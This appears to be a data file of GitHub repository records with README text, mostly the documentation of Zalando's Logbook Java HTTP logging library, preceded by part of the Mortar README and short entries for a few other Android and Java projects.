.build(getScopeName()); } return rootScope.hasService(name) ? rootScope.getService(name) : super.getSystemService(name); } ``` Now any part of our app that has access to a `Context` can inject itself: ```java public class MyView extends LinearLayout { @Inject SomeService service; public MyView(Context context, AttributeSet attrs) { super(context, attrs); ObjectGraphService.inject(context, this); } } ``` To take advantage of the BundleService describe above, you'll put similar code into your Activity. If it doesn't exist already, you'll build a sub-scope to back the Activity's `getSystemService` method, and while building it set up the `BundleServiceRunner`. You'll also notify the BundleServiceRunner each time `onCreate` and `onSaveInstanceState` are called, to make the persistence bundle available to the rest of the app. ```java public class MyActivity extends Activity { private MortarScope activityScope; @Override public Object getSystemService(String name) { MortarScope activityScope = MortarScope.findChild(getApplicationContext(), getScopeName()); if (activityScope == null) { activityScope = MortarScope.buildChild(getApplicationContext()) // .withService(BundleServiceRunner.SERVICE_NAME, new BundleServiceRunner()) .withService(HelloPresenter.class.getName(), new HelloPresenter()) .build(getScopeName()); } return activityScope.hasService(name) ? activityScope.getService(name) : super.getSystemService(name); } @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); BundleServiceRunner.getBundleServiceRunner(this).onCreate(savedInstanceState); setContentView(R.layout.main_view); } @Override protected void onSaveInstanceState(Bundle outState) { super.onSaveInstanceState(outState); BundleServiceRunner.getBundleServiceRunner(this).onSaveInstanceState(outState); } } ``` With that in place, any object in your app can sign up with the `BundleService` to save and restore its state. This is nice for views, since Bundles are less of a hassle than the `Parcelable` objects required by `View#onSaveInstanceState`, and a boon to any business objects in the rest of your app. Download -------- Download [the latest JAR][jar] or grab via Maven: ```xml <dependency> <groupId>com.squareup.mortar</groupId> <artifactId>mortar</artifactId> <version>(insert latest version)</version> </dependency> ``` Gradle: ```groovy compile 'com.squareup.mortar:mortar:(latest version)' ``` ## Full Disclosure This stuff has been in "rapid" development over a pretty long gestation period, but is finally stabilizing. We don't expect drastic changes before cutting a 1.0 release, but we still cannot promise a stable API from release to release. Mortar is a key component of multiple Square apps, including our flagship [Square Register][register] app. License -------- Copyright 2013 Square, Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. [bundle-service]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/bundler/BundleService.java [mvp]: http://en.wikipedia.org/wiki/Model%E2%80%93view%E2%80%93presenter [dagger]: http://square.github.io/dagger/ [dagger2]: http://google.github.io/dagger/ [jar]: http://repository.sonatype.org/service/local/artifact/maven/redirect?r=central-proxy&g=com.squareup.mortar&a=mortar&v=LATEST [og]: https://square.github.io/dagger/1.x/dagger/dagger/ObjectGraph.html [ogplus]: https://github.com/square/dagger/blob/dagger-parent-1.1.0/core/src/main/java/dagger/ObjectGraph.java#L96 [presenter]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/Presenter.java [rant]: http://corner.squareup.com/2014/10/advocating-against-android-fragments.html [register]: https://play.google.com/store/apps/details?id=com.squareup [scope]: https://github.com/square/mortar/blob/master/mortar/src/main/java/mortar/MortarScope.java [services]: http://developer.android.com/reference/android/content/Context.html#getSystemService(java.lang.String)
0
joyoyao/superCleanMaster
[DEPRECATED]
null
# superCleanMaster superCleanMaster is deprecated Thanks for all your support!
0
frogermcs/GithubClient
Example of Github API client implemented on top of Dagger 2 DI framework.
null
# GithubClient Example of Github API client implemented on top of Dagger 2 DI framework. This code was created as an example for Dependency Injection with Dagger 2 series on my dev-blog: - [Introdution to Dependency Injection](http://frogermcs.github.io/dependency-injection-with-dagger-2-introdution-to-di/) - [Dagger 2 API](http://frogermcs.github.io/dependency-injection-with-dagger-2-the-api/) - [Dagger 2 - custom scopes](http://frogermcs.github.io/dependency-injection-with-dagger-2-custom-scopes/) - [Dagger 2 - graph creation performance](http://frogermcs.github.io/dagger-graph-creation-performance/) - [Dependency injection with Dagger 2 - Producers](http://frogermcs.github.io/dependency-injection-with-dagger-2-producers/) - [Inject everything - ViewHolder and Dagger 2 (with Multibinding and AutoFactory example)](http://frogermcs.github.io/inject-everything-viewholder-and-dagger-2-example/) This code was originally prepared for my presentation at Google I/O Extended 2015 in Tech Space Cracow. http://www.meetup.com/GDG-Krakow/events/221822600/
1
sirthias/pegdown
A pure-Java Markdown processor based on a parboiled PEG parser supporting a number of extensions
null
null
0
zalando/logbook
An extensible Java library for HTTP request and response logging
client-side http-logs java logbook logger logging logs monitoring observability plugin-extension request-response server-side spring-boot spring-boot-starter
# Logbook: HTTP request and response logging [![Logbook](docs/logbook.jpg)](#attributions) [![Stability: Active](https://masterminds.github.io/stability/active.svg)](https://masterminds.github.io/stability/active.html) ![Build Status](https://github.com/zalando/logbook/workflows/build/badge.svg) [![Coverage Status](https://img.shields.io/coveralls/zalando/logbook/main.svg)](https://coveralls.io/r/zalando/logbook) [![Javadoc](http://javadoc.io/badge/org.zalando/logbook-core.svg)](http://www.javadoc.io/doc/org.zalando/logbook-core) [![Release](https://img.shields.io/github/release/zalando/logbook.svg)](https://github.com/zalando/logbook/releases) [![Maven Central](https://img.shields.io/maven-central/v/org.zalando/logbook-parent.svg)](https://maven-badges.herokuapp.com/maven-central/org.zalando/logbook-parent) [![License](https://img.shields.io/badge/license-MIT-blue.svg)](https://raw.githubusercontent.com/zalando/logbook/main/LICENSE) [![Project Map](https://sourcespy.com/shield.svg)](https://sourcespy.com/github/zalandologbook/) > **Logbook** noun, /lɑɡ bʊk/: A book in which measurements from the ship's log are recorded, along with other salient details of the voyage. **Logbook** is an extensible Java library to enable complete request and response logging for different client- and server-side technologies. It satisfies a special need by a) allowing web application developers to log any HTTP traffic that an application receives or sends b) in a way that makes it easy to persist and analyze it later. This can be useful for traditional log analysis, meeting audit requirements or investigating individual historic traffic issues. Logbook is ready to use out of the box for most common setups. Even for uncommon applications and technologies, it should be simple to implement the necessary interfaces to connect a library/framework/etc. to it. ## Features - **Logging**: of HTTP requests and responses, including the body; partial logging (no body) for unauthorized requests - **Customization**: of logging format, logging destination, and conditions that request to log - **Support**: for Servlet containers, Apache’s HTTP client, Square's OkHttp, and (via its elegant API) other frameworks - Optional obfuscation of sensitive data - [Spring Boot](http://projects.spring.io/spring-boot/) Auto Configuration - [Scalyr](docs/scalyr.md) compatible - Sensible defaults ## Dependencies - Java 8 (for Spring 6 / Spring Boot 3 and JAX-RS 3.x, Java 17 is required) - Any build tool using Maven Central, or direct download - Servlet Container (optional) - Apache HTTP Client 4.x **or 5.x** (optional) - JAX-RS 3.x (aka Jakarta RESTful Web Services) Client and Server (optional) - JAX-RS 2.x Client and Server (optional) - Netty 4.x (optional) - OkHttp 2.x **or 3.x** (optional) - Spring **6.x** or Spring 5.x (optional, see instructions below) - Spring Boot **3.x** or 2.x (optional) - Ktor (optional) - logstash-logback-encoder 5.x (optional) ## Installation Add the following dependency to your project: ```xml <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-core</artifactId> <version>${logbook.version}</version> </dependency> ``` ### Spring 5 / Spring Boot 2 Support For Spring 5 / Spring Boot 2 backwards compatibility please add the following import: ```xml <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-servlet</artifactId> <version>${logbook.version}</version> <classifier>javax</classifier> </dependency> ``` Additional modules/artifacts of Logbook always share the same version number. Alternatively, you can import our *bill of materials*... ```xml <dependencyManagement> <dependencies> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-bom</artifactId> <version>${logbook.version}</version> <type>pom</type> <scope>import</scope> </dependency> </dependencies> </dependencyManagement> ``` <details> <summary>... which allows you to omit versions:</summary> ```xml <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-core</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-httpclient</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-jaxrs</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-json</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-netty</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-okhttp</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-okhttp2</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-servlet</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-spring-boot-starter</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-ktor-common</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-ktor-client</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-ktor-server</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-ktor</artifactId> </dependency> <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-logstash</artifactId> </dependency> ``` </details> The logbook logger must be configured to trace level in order to log the requests and responses. With Spring Boot 2 (using Logback) this can be accomplished by adding the following line to your `application.properties` ``` logging.level.org.zalando.logbook: TRACE ``` ## Usage All integrations require an instance of `Logbook` which holds all configuration and wires all necessary parts together. You can either create one using all the defaults: ```java Logbook logbook = Logbook.create(); ``` or create a customized version using the `LogbookBuilder`: ```java Logbook logbook = Logbook.builder() .condition(new CustomCondition()) .queryFilter(new CustomQueryFilter()) .pathFilter(new CustomPathFilter()) .headerFilter(new CustomHeaderFilter()) .bodyFilter(new CustomBodyFilter()) .requestFilter(new CustomRequestFilter()) .responseFilter(new CustomResponseFilter()) .sink(new DefaultSink( new CustomHttpLogFormatter(), new CustomHttpLogWriter() )) .build(); ``` ### Strategy Logbook used to have a very rigid strategy how to do request/response logging: - Requests/responses are logged separately - Requests/responses are logged soon as possible - Requests/responses are logged as a pair or not logged at all (i.e. no partial logging of traffic) Some of those restrictions could be mitigated with custom [`HttpLogWriter`](#writing) implementations, but they were never ideal. Starting with version 2.0 Logbook now comes with a [Strategy pattern](https://en.wikipedia.org/wiki/Strategy_pattern) at its core. Make sure you read the documentation of the [`Strategy`](logbook-api/src/main/java/org/zalando/logbook/Strategy.java) interface to understand the implications. Logbook comes with some built-in strategies: - [`BodyOnlyIfStatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/BodyOnlyIfStatusAtLeastStrategy.java) - [`StatusAtLeastStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/StatusAtLeastStrategy.java) - [`WithoutBodyStrategy`](logbook-core/src/main/java/org/zalando/logbook/core/WithoutBodyStrategy.java) ### Attribute Extractor Starting with version 3.4.0, Logbook is equipped with a feature called *Attribute Extractor*. Attributes are basically a list of key/value pairs that can be extracted from request and/or response, and logged with them. The idea was sprouted from [issue 381](https://github.com/zalando/logbook/issues/381), where a feature was requested to extract the subject claim from JWT tokens in the authorization header. The `AttributeExtractor` interface has two `extract` methods: One that can extract attributes from the request only, and one that has both request and response at its avail. The both return an instance of the `HttpAttributes` class, which is basically a fancy `Map<String, Object>`. Notice that since the map values are of type `Object`, they should have a proper `toString()` method in order for them to appear in the logs in a meaningful way. Alternatively, log formatters can work around this by implementing their own serialization logic. For instance, the built-in log formatter `JsonHttpLogFormatter` uses `ObjectMapper` to serialize the values. Here is an example: ```java final class OriginExtractor implements AttributeExtractor { @Override public HttpAttributes extract(final HttpRequest request) { return HttpAttributes.of("origin", request.getOrigin()); } } ``` Logbook must then be created by registering this attribute extractor: ```java final Logbook logbook = Logbook.builder() .attributeExtractor(new OriginExtractor()) .build(); ``` This will result in request logs to include something like: ```text "attributes":{"origin":"LOCAL"} ``` For more advanced examples, look at the `JwtFirstMatchingClaimExtractor` and `JwtAllMatchingClaimsExtractor` classes. The former extracts the first claim matching a list of claim names from the request JWT token. The latter extracts all claims matching a list of claim names from the request JWT token. If you require to incorporate multiple `AttributeExtractor`s, you can use the class `CompositeAttributeExtractor`: ```java final List<AttributeExtractor> extractors = List.of( extractor1, extractor2, extractor3 ); final Logbook logbook = Logbook.builder() .attributeExtractor(new CompositeAttributeExtractor(extractors)) .build(); ``` ### Phases Logbook works in several different phases: 1. [Conditional](#conditional), 2. [Filtering](#filtering), 3. [Formatting](#formatting) and 4. [Writing](#writing) Each phase is represented by one or more interfaces that can be used for customization. Every phase has a sensible default. #### Conditional Logging HTTP messages and including their bodies is a rather expensive task, so it makes a lot of sense to disable logging for certain requests. A common use case would be to ignore *health check* requests from a load balancer, or any request to management endpoints typically issued by developers. Defining a condition is as easy as writing a special `Predicate` that decides whether a request (and its corresponding response) should be logged or not. Alternatively you can use and combine predefined predicates: ```java Logbook logbook = Logbook.builder() .condition(exclude( requestTo("/health"), requestTo("/admin/**"), contentType("application/octet-stream"), header("X-Secret", newHashSet("1", "true")::contains))) .build(); ``` Exclusion patterns, e.g. `/admin/**`, are loosely following [Ant's style of path patterns](https://ant.apache.org/manual/dirtasks.html#patterns) without taking the the query string of the URL into consideration. #### Filtering The goal of *Filtering* is to prevent the logging of certain sensitive parts of HTTP requests and responses. This usually includes the *Authorization* header, but could also apply to certain plaintext query or form parameters — e.g. *password*. Logbook supports different types of filters: | Type | Operates on | Applies to | Default | |------------------|--------------------------------|------------|-----------------------------------------------------------------------------------| | `QueryFilter` | Query string | request | `access_token` | | `PathFilter` | Path | request | n/a | | `HeaderFilter` | Header (single key-value pair) | both | `Authorization` | | `BodyFilter` | Content-Type and body | both | json: `access_token` and `refresh_token`<br> form: `client_secret` and `password` | | `RequestFilter` | `HttpRequest` | request | Replace binary, multipart and stream bodies. | | `ResponseFilter` | `HttpResponse` | response | Replace binary, multipart and stream bodies. | `QueryFilter`, `PathFilter`, `HeaderFilter` and `BodyFilter` are relatively high-level and should cover all needs in ~90% of all cases. For more complicated setups one should fallback to the low-level variants, i.e. `RequestFilter` and `ResponseFilter` respectively (in conjunction with `ForwardingHttpRequest`/`ForwardingHttpResponse`). You can configure filters like this: ```java import static org.zalando.logbook.core.HeaderFilters.authorization; import static org.zalando.logbook.core.HeaderFilters.eachHeader; import static org.zalando.logbook.core.QueryFilters.accessToken; import static org.zalando.logbook.core.QueryFilters.replaceQuery; Logbook logbook = Logbook.builder() .requestFilter(RequestFilters.replaceBody(message -> contentType("audio/*").test(message) ? "mmh mmh mmh mmh" : null)) .responseFilter(ResponseFilters.replaceBody(message -> contentType("*/*-stream").test(message) ? "It just keeps going and going..." : null)) .queryFilter(accessToken()) .queryFilter(replaceQuery("password", "<secret>")) .headerFilter(authorization()) .headerFilter(eachHeader("X-Secret"::equalsIgnoreCase, "<secret>")) .build(); ``` You can configure as many filters as you want - they will run consecutively. ##### JsonPath body filtering (experimental) You can apply [JSON Path](https://github.com/json-path/JsonPath) filtering to JSON bodies. Here are some examples: ```java import static org.zalando.logbook.json.JsonPathBodyFilters.jsonPath; import static java.util.regex.Pattern.compile; Logbook logbook = Logbook.builder() .bodyFilter(jsonPath("$.password").delete()) .bodyFilter(jsonPath("$.active").replace("unknown")) .bodyFilter(jsonPath("$.address").replace("X")) .bodyFilter(jsonPath("$.name").replace(compile("^(\\w).+"), "$1.")) .bodyFilter(jsonPath("$.friends.*.name").replace(compile("^(\\w).+"), "$1.")) .bodyFilter(jsonPath("$.grades.*").replace(1.0)) .build(); ``` Take a look at the following example, before and after filtering was applied: <details> <summary>Before</summary> ```json { "id": 1, "name": "Alice", "password": "s3cr3t", "active": true, "address": "Anhalter Straße 17 13, 67278 Bockenheim an der Weinstraße", "friends": [ { "id": 2, "name": "Bob" }, { "id": 3, "name": "Charlie" } ], "grades": { "Math": 1.0, "English": 2.2, "Science": 1.9, "PE": 4.0 } } ``` </details> <details> <summary>After</summary> ```json { "id": 1, "name": "Alice", "active": "unknown", "address": "XXX", "friends": [ { "id": 2, "name": "B." }, { "id": 3, "name": "C." } ], "grades": { "Math": 1.0, "English": 1.0, "Science": 1.0, "PE": 1.0 } } ``` </details> #### Correlation Logbook uses a *correlation id* to correlate requests and responses. This allows match-related requests and responses that would usually be located in different places in the log file. If the default implementation of the correlation id is insufficient for your use case, you may provide a custom implementation: ```java Logbook logbook = Logbook.builder() .correlationId(new CustomCorrelationId()) .build(); ``` #### Formatting *Formatting* defines how requests and responses will be transformed to strings basically. Formatters do **not** specify where requests and responses are logged to — writers do that work. Logbook comes with two different default formatters: *HTTP* and *JSON*. ##### HTTP *HTTP* is the default formatting style, provided by the `DefaultHttpLogFormatter`. It is primarily designed to be used for local development and debugging, not for production use. This is because it’s not as readily machine-readable as JSON. ###### Request ```http Incoming Request: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b GET http://example.org/test HTTP/1.1 Accept: application/json Host: localhost Content-Type: text/plain Hello world! ``` ###### Response ```http Outgoing Response: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b Duration: 25 ms HTTP/1.1 200 Content-Type: application/json {"value":"Hello world!"} ``` ##### JSON *JSON* is an alternative formatting style, provided by the `JsonHttpLogFormatter`. Unlike HTTP, it is primarily designed for production use — parsers and log consumers can easily consume it. Requires the following dependency: ```xml <dependency> <groupId>org.zalando</groupId> <artifactId>logbook-json</artifactId> </dependency> ``` ###### Request ```json { "origin": "remote", "type": "request", "correlation": "2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b", "protocol": "HTTP/1.1", "sender": "127.0.0.1", "method": "GET", "uri": "http://example.org/test", "host": "example.org", "path": "/test", "scheme": "http", "port": null, "headers": { "Accept": ["application/json"], "Content-Type": ["text/plain"] }, "body": "Hello world!" } ``` ###### Response ```json { "origin": "local", "type": "response", "correlation": "2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b", "duration": 25, "protocol": "HTTP/1.1", "status": 200, "headers": { "Content-Type": ["text/plain"] }, "body": "Hello world!" } ``` Note: Bodies of type `application/json` (and `application/*+json`) will be *inlined* into the resulting JSON tree. I.e., a JSON response body will **not** be escaped and represented as a string: ```json { "origin": "local", "type": "response", "correlation": "2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b", "duration": 25, "protocol": "HTTP/1.1", "status": 200, "headers": { "Content-Type": ["application/json"] }, "body": { "greeting": "Hello, world!" } } ``` ##### Common Log Format The Common Log Format ([CLF](https://httpd.apache.org/docs/trunk/logs.html#common)) is a standardized text file format used by web servers when generating server log files. The format is supported via the `CommonsLogFormatSink`: ```text 185.85.220.253 - - [02/Aug/2019:08:16:41 0000] "GET /search?q=zalando HTTP/1.1" 200 - ``` ##### Extended Log Format The Extended Log Format ([ELF](https://en.wikipedia.org/wiki/Extended_Log_Format)) is a standardised text file format, like Common Log Format (CLF), that is used by web servers when generating log files, but ELF files provide more information and flexibility. The format is supported via the `ExtendedLogFormatSink`. Also see [W3C](https://www.w3.org/TR/WD-logfile.html) document. Default fields: ```text date time c-ip s-dns cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-bytes time-taken cs-protocol cs(User-Agent) cs(Cookie) cs(Referrer) ``` Default log output example: ```text 2019-08-02 08:16:41 185.85.220.253 localhost POST /search ?q=zalando 200 21 20 0.125 HTTP/1.1 "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0" "name=value" "https://example.com/page?q=123" ``` Users may override default fields with their custom fields through the constructor of `ExtendedLogFormatSink`: ```java new ExtendedLogFormatSink(new DefaultHttpLogWriter(),"date time cs(Custom-Request-Header) sc(Custom-Response-Header)") ``` For Http header fields: `cs(Any-Header)` and `sc(Any-Header)`, users could specify any headers they want to extract from the request. Other supported fields are listed in the value of `ExtendedLogFormatSink.Field`, which can be put in the custom field expression. ##### cURL *cURL* is an alternative formatting style, provided by the `CurlHttpLogFormatter` which will render requests as executable [`cURL`](https://curl.haxx.se/) commands. Unlike JSON, it is primarily designed for humans. ###### Request ```bash curl -v -X GET 'http://localhost/test' -H 'Accept: application/json' ``` ###### Response See [HTTP](#http) or provide own fallback for responses: ```java new CurlHttpLogFormatter(new JsonHttpLogFormatter()); ``` ##### Splunk *Splunk* is an alternative formatting style, provided by the `SplunkHttpLogFormatter` which will render requests and response as key-value pairs. ###### Request ```text origin=remote type=request correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b protocol=HTTP/1.1 sender=127.0.0.1 method=POST uri=http://example.org/test host=example.org scheme=http port=null path=/test headers={Accept=[application/json], Content-Type=[text/plain]} body=Hello world! ``` ###### Response ```text origin=local type=response correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b duration=25 protocol=HTTP/1.1 status=200 headers={Content-Type=[text/plain]} body=Hello world! ``` #### Writing Writing defines where formatted requests and responses are written to. Logbook comes with three implementations: Logger, Stream and Chunking. ##### Logger By default, requests and responses are logged with an *slf4j* logger that uses the `org.zalando.logbook.Logbook` category and the log level `trace`. This can be customized: ```java Logbook logbook = Logbook.builder() .sink(new DefaultSink( new DefaultHttpLogFormatter(), new DefaultHttpLogWriter() )) .build(); ``` ##### Stream An alternative implementation is to log requests and responses to a `PrintStream`, e.g. `System.out` or `System.err`. This is usually a bad choice for running in production, but can sometimes be useful for short-term local development and/or investigation. ```java Logbook logbook = Logbook.builder() .sink(new DefaultSink( new DefaultHttpLogFormatter(), new StreamHttpLogWriter(System.err) )) .build(); ``` ##### Chunking The `ChunkingSink` will split long messages into smaller chunks and will write them individually while delegating to another sink: ```java Logbook logbook = Logbook.builder() .sink(new ChunkingSink(sink, 1000)) .build(); ``` #### Sink The combination of `HttpLogFormatter` and `HttpLogWriter` suits most use cases well, but it has limitations. Implementing the `Sink` interface directly allows for more sophisticated use cases, e.g. writing requests/responses to a structured persistent storage like a database. Multiple sinks can be combined into one using the `CompositeSink`. ### Servlet You’ll have to register the `LogbookFilter` as a `Filter` in your filter chain — either in your `web.xml` file (please note that the xml approach will use all the defaults and is not configurable): ```xml <filter> <filter-name>LogbookFilter</filter-name> <filter-class>org.zalando.logbook.servlet.LogbookFilter</filter-class> </filter> <filter-mapping> <filter-name>LogbookFilter</filter-name> <url-pattern>/*</url-pattern> <dispatcher>REQUEST</dispatcher> <dispatcher>ASYNC</dispatcher> </filter-mapping> ``` or programmatically, via the `ServletContext`: ```java context.addFilter("LogbookFilter", new LogbookFilter(logbook)) .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, "/*"); ``` **Beware**: The `ERROR` dispatch is not supported. You're strongly advised to produce error responses within the `REQUEST` or `ASNYC` dispatch. The `LogbookFilter` will, by default, treat requests with a `application/x-www-form-urlencoded` body not different from any other request, i.e you will see the request body in the logs. The downside of this approach is that you won't be able to use any of the `HttpServletRequest.getParameter*(..)` methods. See issue [#94](../../issues/94) for some more details. #### Form Requests As of Logbook 1.5.0, you can now specify one of three strategies that define how Logbook deals with this situation by using the `logbook.servlet.form-request` system property: | Value | Pros | Cons | |------------------|-----------------------------------------------------------------------------------|----------------------------------------------------| | `body` (default) | Body is logged | Downstream code can **not use `getParameter*()`** | | `parameter` | Body is logged (but it's reconstructed from parameters) | Downstream code can **not use `getInputStream()`** | | `off` | Downstream code can decide whether to use `getInputStream()` or `getParameter*()` | Body is **not logged** | #### Security Secure applications usually need a slightly different setup. You should generally avoid logging unauthorized requests, especially the body, because it quickly allows attackers to flood your logfile — and, consequently, your precious disk space. Assuming that your application handles authorization inside another filter, you have two choices: - Don't log unauthorized requests - Log unauthorized requests without the request body You can easily achieve the former setup by placing the `LogbookFilter` after your security filter. The latter is a little bit more sophisticated. You’ll need two `LogbookFilter` instances — one before your security filter, and one after it: ```java context.addFilter("SecureLogbookFilter", new SecureLogbookFilter(logbook)) .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, "/*"); context.addFilter("securityFilter", new SecurityFilter()) .addMappingForUrlPatterns(EnumSet.of(REQUEST), true, "/*"); context.addFilter("LogbookFilter", new LogbookFilter(logbook)) .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, "/*"); ``` The first logbook filter will log unauthorized requests **only**. The second filter will log authorized requests, as always. ### HTTP Client The `logbook-httpclient` module contains both an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`: ```java CloseableHttpClient client = HttpClientBuilder.create() .addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook)) .addInterceptorFirst(new LogbookHttpResponseInterceptor()) .build(); ``` Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient` there is another way to log responses: ```java CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create() .addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook)) .build(); // and then wrap your response consumer client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback) ``` ### HTTP Client 5 The `logbook-httpclient5` module contains an `ExecHandler` to use with the `HttpClient`: ```java CloseableHttpClient client = HttpClientBuilder.create() .addExecInterceptorFirst("Logbook", new LogbookHttpExecHandler(logbook)) .build(); ``` The Handler should be added first, such that a compression is performed after logging and decompression is performed before logging. To avoid a breaking change, there is also an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`, which works fine as long as compression (or other ExecHandlers) is not used: ```java CloseableHttpClient client = HttpClientBuilder.create() .addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook)) .addResponseInterceptorFirst(new LogbookHttpResponseInterceptor()) .build(); ``` Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient` there is another way to log responses: ```java CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create() .addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook)) .build(); // and then wrap your response consumer client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback) ``` ### JAX-RS 2.x and 3.x (aka Jakarta RESTful Web Services) > [!NOTE] > **Support for JAX-RS 2.x** > > JAX-RS 2.x (legacy) support was dropped in Logbook 3.0 to 3.6. > > As of Logbook 3.7, JAX-RS 2.x support is back. > > However, you need to add the `javax` **classifier** to use the proper Logbook module: > > ```xml > <dependency> > <groupId>org.zalando</groupId> > <artifactId>logbook-jaxrs</artifactId> > <version>${logbook.version}</version> > <classifier>javax</classifier> > </dependency> > ``` > > You should also make sure that the following dependencies are on your classpath. > By default, `logbook-jaxrs` imports `jersey-client 3.x`, which is not compatible with JAX-RS 2.x: > > * [jersey-client 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.core/jersey-client/2.41) > * [jersey-hk2 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.inject/jersey-hk2/2.41) > * [javax.activation](https://mvnrepository.com/artifact/javax.activation/activation/1.1.1) The `logbook-jaxrs` module contains: A `LogbookClientFilter` to be used for applications making HTTP requests ```java client.register(new LogbookClientFilter(logbook)); ``` A `LogbookServerFilter` for be used with HTTP servers ```java resourceConfig.register(new LogbookServerFilter(logbook)); ``` ### JDK HTTP Server The `logbook-jdkserver` module provides support for [JDK HTTP server](https://docs.oracle.com/javase/8/docs/jre/api/net/httpserver/spec/com/sun/net/httpserver/HttpServer.html) and contains: A `LogbookFilter` to be used with the builtin server ```java httpServer.createContext(path,handler).getFilters().add(new LogbookFilter(logbook)) ``` ### Netty The `logbook-netty` module contains: A `LogbookClientHandler` to be used with an `HttpClient`: ```java HttpClient httpClient = HttpClient.create() .doOnConnected( (connection -> connection.addHandlerLast(new LogbookClientHandler(logbook))) ); ``` A `LogbookServerHandler` for use used with an `HttpServer`: ```java HttpServer httpServer = HttpServer.create() .doOnConnection( connection -> connection.addHandlerLast(new LogbookServerHandler(logbook)) ); ``` #### Spring WebFlux Users of Spring WebFlux can pick any of the following options: - Programmatically create a `NettyWebServer` (passing an `HttpServer`) - Register a custom `NettyServerCustomizer` - Programmatically create a `ReactorClientHttpConnector` (passing an `HttpClient`) - Register a custom `WebClientCustomizer` - Use separate connector-independent module `logbook-spring-webflux` #### Micronaut Users of Micronaut can follow the [official docs](https://docs.micronaut.io/snapshot/guide/index.html#nettyClientPipeline) on how to integrate Logbook with Micronaut. :warning: Even though Quarkus and Vert.x use Netty under the hood, unfortunately neither of them allows accessing or customizing it (yet). ### OkHttp v2.x The `logbook-okhttp2` module contains an `Interceptor` to use with version 2.x of the `OkHttpClient`: ```java OkHttpClient client = new OkHttpClient(); client.networkInterceptors().add(new LogbookInterceptor(logbook)); ``` If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition. The transparent gzip support built into OkHttp will run after any network interceptor which forces logbook to log compressed binary responses. ```java OkHttpClient client = new OkHttpClient(); client.networkInterceptors().add(new LogbookInterceptor(logbook)); client.networkInterceptors().add(new GzipInterceptor()); ``` ### OkHttp v3.x The `logbook-okhttp` module contains an `Interceptor` to use with version 3.x of the `OkHttpClient`: ```java OkHttpClient client = new OkHttpClient.Builder() .addNetworkInterceptor(new LogbookInterceptor(logbook)) .build(); ``` If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition. The transparent gzip support built into OkHttp will run after any network interceptor which forces logbook to log compressed binary responses. ```java OkHttpClient client = new OkHttpClient.Builder() .addNetworkInterceptor(new LogbookInterceptor(logbook)) .addNetworkInterceptor(new GzipInterceptor()) .build(); ``` ### Ktor The `logbook-ktor-client` module contains: A `LogbookClient` to be used with an `HttpClient`: ```kotlin private val client = HttpClient(CIO) { install(LogbookClient) { logbook = logbook } } ``` The `logbook-ktor-server` module contains: A `LogbookServer` to be used with an `Application`: ```kotlin private val server = embeddedServer(CIO) { install(LogbookServer) { logbook = logbook } } ``` Alternatively, you can use `logbook-ktor`, which ships both `logbook-ktor-client` and `logbook-ktor-server` modules. ### Spring The `logbook-spring` module contains a `ClientHttpRequestInterceptor` to use with `RestTemplate`: ```java LogbookClientHttpRequestInterceptor interceptor = new LogbookClientHttpRequestInterceptor(logbook); RestTemplate restTemplate = new RestTemplate(); restTemplate.getInterceptors().add(interceptor); ``` 